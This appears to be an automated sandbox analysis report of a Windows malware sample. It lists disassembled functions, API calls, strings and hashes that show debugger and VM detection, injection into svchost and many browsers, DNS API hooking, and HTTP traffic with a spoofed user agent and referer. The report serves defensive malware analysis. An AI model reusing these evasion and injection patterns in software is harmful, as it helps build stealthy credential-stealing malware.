Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0

VariantClear.OLEAUT32(?), ref: 004032D6
VariantClear.OLEAUT32(?), ref: 004032DC
VariantClear.OLEAUT32(?), ref: 004032E2

Strings

cmd.exe, xrefs: 00403141
p=<u, xrefs: 00402F05, 004031F2
.5@, xrefs: 0040306D, 00403237, 00403070, 00403240
.5@, xrefs: 00403009, 00403030, 00403071, 00403095, 00403146, 00403166, 004031AA, 004031CA, 00403241, 004032C8, 0040303C

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
String ID: .5@$.5@$cmd.exe$p=<u
API String ID: 2839743307-1930425439
Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94

Function 00401FB0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FD6
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
GetLastError.KERNEL32 ref: 00401FF0
SwitchToThread.KERNEL32 ref: 00401FFF
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
CloseHandle.KERNEL32(00000000), ref: 00402039
Module32First.KERNEL32(00000000,?), ref: 0040205A
StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
Module32Next.KERNEL32(00000000,00000224), ref: 00402096

Strings

.dll, xrefs: 00402082
kernel, xrefs: 00402070

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669

Function 00402E40 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402E47
GetProcessHeap.KERNEL32(00000000,?,.5@,753CE610,00402E2E), ref: 00402E5F
HeapValidate.KERNEL32(00000000), ref: 00402E62
GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
HeapFree.KERNEL32(00000000), ref: 00402E72
GetProcessHeap.KERNEL32(00000000,.5@,.5@,753CE610,00402E2E), ref: 00402E7B
HeapValidate.KERNEL32(00000000), ref: 00402E7E
GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
HeapFree.KERNEL32(00000000), ref: 00402E8E

Strings

.5@, xrefs: 00402E54, 00402E78, 00402E88

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID: .5@
API String ID: 2629017576-427766238
Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8

Function 00401600 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040160B
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Strings

RtlUniform, xrefs: 00401626
)@, xrefs: 00401644
ntdll.dll, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll$)@
API String ID: 1545651562-3472953331
Opcode ID: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction ID: a861cb93b7f16bf3c872219f5ba967f96d5ad720afefe63f3816ea97d3f010e1
Opcode Fuzzy Hash: d7d83ff0900f622d049b5be12cc15580f74a08d0b5689ce42f4a0c39a4c223af
Instruction Fuzzy Hash: 89E01AB0600310DBEB009FB2AD09A563699AA94B113448836A709F21E2DA3CD810CA6D

Function 00401920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040194A
GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

Strings

RtlUniform, xrefs: 0040195D
ntdll.dll, xrefs: 00401952

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick
String ID: RtlUniform$ntdll.dll
API String ID: 1545651562-3277137149
Opcode ID: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction ID: 42b0d571b2b9ac5a956892dcf26f74189b3fac86f907fc126faefe0e596b578b
Opcode Fuzzy Hash: 722f6cd1cbe50953a6b5d4977baf4a995fd7d4408477fa0f27fd114fcda5d871
Instruction Fuzzy Hash: B601A771600314DBC7149FBAAC81996B759AB88B15710443AEA09E32D3C63DDC05CBBC

Analysis Process: svchost.exePID: 6720, Parent PID: 6696COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	80.2%
Signature Coverage:	28.8%
Total number of Nodes:	986
Total number of Limit Nodes:	36

Executed Functions

Function 02D367D0 Relevance: 279.1, APIs: 126, Strings: 33, Instructions: 881threadmemorylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D23440: memset.MSVCRT ref: 02D2347B
Part of subcall function 02D23440: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D2349A
Part of subcall function 02D23440: PathAddBackslashA.SHLWAPI(?), ref: 02D234A7
Part of subcall function 02D23440: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D234C4
Part of subcall function 02D23440: _snprintf.MSVCRT ref: 02D234DF
Part of subcall function 02D23440: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D23503
Part of subcall function 02D23440: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D2351F
Part of subcall function 02D23440: PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D235AD

Part of subcall function 02D455C0: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D455EF
Part of subcall function 02D455C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D45628
Part of subcall function 02D455C0: _snprintf.MSVCRT ref: 02D45693

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02D367F0
PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02D367FB
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D3680F
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D3682B
GetCommandLineA.KERNEL32 ref: 02D36835
GetCommandLineW.KERNEL32 ref: 02D3686D
InitializeCriticalSection.KERNEL32(02D6FB68), ref: 02D3689B
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D368B2
CreateThread.KERNEL32(00000000,00000000,02D33140,00000000,00000000,00000000), ref: 02D36900
GetHandleInformation.KERNEL32(00000000,?), ref: 02D36914
CloseHandle.KERNEL32(00000000), ref: 02D36925
CreateThread.KERNEL32(00000000,00000000,02D37820,00000000,00000000,00000000), ref: 02D36954
GetHandleInformation.KERNEL32(00000000,?), ref: 02D36968
CloseHandle.KERNEL32(00000000), ref: 02D36979
CreateThread.KERNEL32(00000000,00000000,02D37B30,00000000,00000000,00000000), ref: 02D3698E
InitializeCriticalSection.KERNEL32(02D6FB80), ref: 02D3699F
CreateThread.KERNEL32(00000000,00000000,02D37430,00000000,00000000,00000000), ref: 02D369B0
GetHandleInformation.KERNEL32(00000000,?), ref: 02D369C4
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D369D5
CreateThread.KERNEL32(00000000,00000000,02D36510,00000000,00000000,00000000), ref: 02D369EF
GetHandleInformation.KERNEL32(00000000,?), ref: 02D36A03
CloseHandle.KERNEL32(00000000), ref: 02D36A14
CreateThread.KERNEL32(00000000,00000000,02D35020,00000000,00000000,00000000), ref: 02D36A3E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D36A52
CloseHandle.KERNEL32(00000000), ref: 02D36A63
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D36A72
HeapValidate.KERNEL32(00000000), ref: 02D36A75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D36A82
HeapFree.KERNEL32(00000000), ref: 02D36A85
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D36AA9
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D36ABB
GetCurrentProcess.KERNEL32(00000000), ref: 02D36AC7

Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26A81
Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26A9F
Part of subcall function 02D26A50: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D26ABB
Part of subcall function 02D26A50: RegQueryValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104), ref: 02D26AE2
Part of subcall function 02D26A50: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D26B5A
Part of subcall function 02D26A50: HeapAlloc.KERNEL32(00000000), ref: 02D26B61
Part of subcall function 02D26A50: memset.MSVCRT ref: 02D26B75
Part of subcall function 02D26A50: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D26B8E
Part of subcall function 02D26A50: RegCloseKey.ADVAPI32(?), ref: 02D26B9C

IsUserAnAdmin.SHELL32 ref: 02D36AD6
StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02D36AF2
StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02D36B19
StrStrIA.SHLWAPI(?,\java.exe), ref: 02D36B2F
StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02D36B45
StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02D36B5B
StrStrIA.SHLWAPI(?,\opera.exe), ref: 02D36B71
StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02D36B87
StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02D36B9D
StrStrIA.SHLWAPI(?,\avant.exe), ref: 02D36BB3
StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02D36BC9
StrStrIA.SHLWAPI(?,\safari.exe), ref: 02D36BDF
StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02D36BF5
StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02D36C0B
StrStrIA.SHLWAPI(?,\frd.exe), ref: 02D36C21
StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02D36C37
StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02D36C4D
CreateThread.KERNEL32(00000000,00000000,02D3B3F0,00000000,00000000,00000000), ref: 02D36C7B
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36C95
CloseHandle.KERNEL32(00000000), ref: 02D36CA2
CreateThread.KERNEL32(00000000,00000000,02D3EA80,00000000,00000000,00000000), ref: 02D36CB7
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36CCB
CloseHandle.KERNEL32(00000000), ref: 02D36CD8
CreateThread.KERNEL32(00000000,00000000,02D40070,00000000,00000000,00000000), ref: 02D36CED
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D01
CloseHandle.KERNEL32(00000000), ref: 02D36D0E
CreateThread.KERNEL32(00000000,00000000,02D408E0,00000000,00000000,00000000), ref: 02D36D23
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D37
CloseHandle.KERNEL32(00000000), ref: 02D36D44
CreateThread.KERNEL32(00000000,00000000,02D3F1B0,00000000,00000000,00000000), ref: 02D36D59
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36D6D
CloseHandle.KERNEL32(00000000), ref: 02D36D7A
CreateThread.KERNEL32(00000000,00000000,02D3C670,00000000,00000000,00000000), ref: 02D36D8F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36DA3
CloseHandle.KERNEL32(00000000), ref: 02D36DB0
CreateThread.KERNEL32(00000000,00000000,02D3C710,00000000,00000000,00000000), ref: 02D36DC5
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36DD9
CloseHandle.KERNEL32(00000000), ref: 02D36DE6
CreateThread.KERNEL32(00000000,00000000,02D41060,00000000,00000000,00000000), ref: 02D36DFB
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36E0F
CloseHandle.KERNEL32(00000000), ref: 02D36E1C
CreateThread.KERNEL32(00000000,00000000,02D420F0,00000000,00000000,00000000), ref: 02D36E31
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D36E45
CloseHandle.KERNEL32(00000000), ref: 02D36E52
CreateThread.KERNEL32(00000000,00000000,02D42DE0,00000000,00000000,00000000), ref: 02D36E67

Part of subcall function 02D3A240: CreateMutexA.KERNEL32(00000000,00000000,00000000,75B07390,?,?,02D36AFD), ref: 02D3A25A
Part of subcall function 02D3A240: CreateThread.KERNEL32(00000000,00000000,02D3A2B0,00000000,00000000,00000000), ref: 02D3A274
Part of subcall function 02D3A240: GetHandleInformation.KERNEL32(00000000,?,?,?,02D36AFD), ref: 02D3A28C
Part of subcall function 02D3A240: CloseHandle.KERNEL32(00000000,?,?,02D36AFD), ref: 02D3A29D

Part of subcall function 02D26070: IsUserAnAdmin.SHELL32 ref: 02D26070
Part of subcall function 02D26070: DnsFlushResolverCache.DNSAPI ref: 02D2607A
Part of subcall function 02D26070: LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02D2608A
Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D260A3
Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D260BF
Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D260DB
Part of subcall function 02D26070: GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D260F7

GetCurrentProcessId.KERNEL32 ref: 02D3714F

Part of subcall function 02D44450: OpenProcess.KERNEL32(00000400,00000000,00000000,74DEF550,00000000,76EEC3F0), ref: 02D44465
Part of subcall function 02D44450: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D4447C
Part of subcall function 02D44450: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D4449A
Part of subcall function 02D44450: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D353C3), ref: 02D444B2
Part of subcall function 02D44450: GetHandleInformation.KERNEL32(?,00000000), ref: 02D4450B
Part of subcall function 02D44450: FindCloseChangeNotification.KERNEL32(?), ref: 02D4451C
Part of subcall function 02D44450: GetHandleInformation.KERNEL32(00000000,?), ref: 02D4452E
Part of subcall function 02D44450: CloseHandle.KERNEL32(00000000), ref: 02D4453F

GetCurrentThreadId.KERNEL32 ref: 02D3715E
GetThreadDesktop.USER32(00000000,00000002,?,00000100,00000000), ref: 02D37177
GetUserObjectInformationA.USER32(00000000), ref: 02D3717E
lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D37194
CreateThread.KERNEL32(00000000,00000000,02D2BA40,00000000,00000000,00000000), ref: 02D371A8
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D371C0
CloseHandle.KERNEL32(00000000), ref: 02D371D1
CreateThread.KERNEL32(00000000,00000000,02D27D50,00000000,00000000,00000000), ref: 02D371E6
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D371FE
CloseHandle.KERNEL32(00000000), ref: 02D3720F

Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C

Strings

\maxthon.exe, xrefs: 02D36B91
RtlFreeHeap, xrefs: 02D3711C
\isclient.exe, xrefs: 02D37053
\explorer.exe, xrefs: 02D36C41
\firefox.exe, xrefs: 02D36B7B
\java.exe, xrefs: 02D36B23
\tbb-firefox.exe, xrefs: 02D36BFF
\svchost.exe, xrefs: 02D36AE6
\javaws.exe, xrefs: 02D36B4F
\iexplore.exe, xrefs: 02D36B0D
--no-sandbox, xrefs: 02D36889
\avant.exe, xrefs: 02D36BA7
\notepad.exe, xrefs: 02D370D5
IsWow64Process, xrefs: 02D36AB5
\clmain.exe, xrefs: 02D3709F
\cbsmain.dll, xrefs: 02D3708D
--no-sandbox, xrefs: 02D36848
\frd.exe, xrefs: 02D36C15
kernel32.dll, xrefs: 02D36A9D
\intpro.exe, xrefs: 02D3707B
\core.exe, xrefs: 02D370B1
\netscape.exe, xrefs: 02D36BE9
A1633F27a, xrefs: 02D36A1F
C:\Users\user\AppData\Roaming\, xrefs: 02D367E3, 02D367F6
\chrome.exe, xrefs: 02D3681F, 02D36C2B, 02D37131
\safari.exe, xrefs: 02D36BD3
\mnp.exe, xrefs: 02D36BBD
\opera.exe, xrefs: 02D36B65, 02D37100
\ipc_full.exe, xrefs: 02D37069
\javaw.exe, xrefs: 02D36B39
ntdll.dll, xrefs: 02D37121
\rundll32.exe, xrefs: 02D370C3
a1633b6ba, xrefs: 02D37188

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Information$CreateThread$Close$Process$Heap$AddressProcwsprintf$OpenPathmemset$CurrentUser$AdminBackslashChangeCommandCriticalFileFindInitializeLineModuleMutexNameNotificationQuerySectionTokenValueVolume_snprintf$AllocCacheCharComputerDesktopDirectoryEnvironmentExistsFlushFolderFreeLibraryLoadObjectResolverSystemUpperValidateVariableWindowslstrcmpilstrcpynlstrlen
String ID: --no-sandbox$ --no-sandbox$A1633F27a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$a1633b6ba$kernel32.dll$ntdll.dll
API String ID: 1297835225-2267504579
Opcode ID: c16f22a31ff9b8cf07b7290fa7587aa4c1e1196538d2959d42076917c128b91e
Instruction ID: 3fcba56df54f7eb2ce729b4b32996a29751a6c0e02a45d12cc04e1ee91fd4d9e
Opcode Fuzzy Hash: c16f22a31ff9b8cf07b7290fa7587aa4c1e1196538d2959d42076917c128b91e
Instruction Fuzzy Hash: 4652A371A81315B6FB2297A0DD09FAE77A8AF04B44F644544FA05B63C4DBB0DE44CAF8

Function 02D34680 Relevance: 91.4, APIs: 44, Strings: 8, Instructions: 387
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D346BD
GetProcessHeap.KERNEL32(00000008,?,02D26C17,Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),?), ref: 02D346F7
HeapAlloc.KERNEL32(00000000), ref: 02D346FE
memset.MSVCRT ref: 02D3470E
memcpy.MSVCRT ref: 02D3472D
InternetOpenA.WININET(?,00000000,00000000,00000000,04000000), ref: 02D34791
InternetConnectA.WININET(00000000,02D26C17,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02D347B0
HttpOpenRequestA.WININET(?,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02D347E8
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02D34819
HttpAddRequestHeadersA.WININET(?,Referer: http://www.google.com,000000FF,20000000), ref: 02D3482D
_snprintf.MSVCRT ref: 02D3484B
HttpAddRequestHeadersA.WININET(?,?,000000FF,20000000), ref: 02D34863
HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 02D34879
HttpQueryInfoA.WININET(?,20000013,?,00000004,?), ref: 02D3489C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D348D4
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02D348F2
HeapAlloc.KERNEL32(00000000), ref: 02D348F5
memset.MSVCRT ref: 02D3490D
InternetReadFile.WININET(?,00000000,00001000,?), ref: 02D3492A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D3494B
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D3495B
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D3496A
UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02D3497A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34983
HeapValidate.KERNEL32(00000000), ref: 02D3498A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3499B
HeapFree.KERNEL32(00000000), ref: 02D349A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D349B0
HeapValidate.KERNEL32(00000000), ref: 02D349B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D349C0
HeapFree.KERNEL32(00000000), ref: 02D349C3
GetHandleInformation.KERNEL32(00000000,?), ref: 02D349D9
CloseHandle.KERNEL32(00000000), ref: 02D349EA
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D34A6F
HeapValidate.KERNEL32(00000000), ref: 02D34A72
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D34A7F
HeapFree.KERNEL32(00000000), ref: 02D34A82
GetProcessHeap.KERNEL32(00000000,?), ref: 02D34A9A
HeapValidate.KERNEL32(00000000), ref: 02D34A9D

Strings

HTTP/1.0, xrefs: 02D347E0
3eaeb407628e78f, xrefs: 02D34835
POST, xrefs: 02D347CD, 02D347E6
Referer: http://www.google.com, xrefs: 02D34827
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02D3468A
GET, xrefs: 02D347C4
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02D3483A
Content-Type: application/x-www-form-urlencoded, xrefs: 02D34811

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FileHttp$Request$Validate$FreeHeadersInternetmemset$AllocHandleOpen$CloseConnectCreateInfoInformationLockPointerQueryReadSendUnlockWrite_snprintfmemcpy
String ID: 3eaeb407628e78f$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 912145775-1534480673
Opcode ID: 36e2ebef47fce9c32fc0e3694e7a520841cc1e87aced6dbf4f47e7a64dbd8d69
Instruction ID: 55d9bc8566bb8840fec6d5b486b3e15284ddafcb25c99e0e69649d2b5997ed16
Opcode Fuzzy Hash: 36e2ebef47fce9c32fc0e3694e7a520841cc1e87aced6dbf4f47e7a64dbd8d69
Instruction Fuzzy Hash: 7ED18071A40255ABEB219FA5DC8DFAB7BA8EF08718F144518FA05E6380D778DD40CBB4

Function 00402B70 Relevance: 68.4, APIs: 30, Strings: 9, Instructions: 163
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
Part of subcall function 00401000: StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
Part of subcall function 00401000: FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
Part of subcall function 00401000: PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A

Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
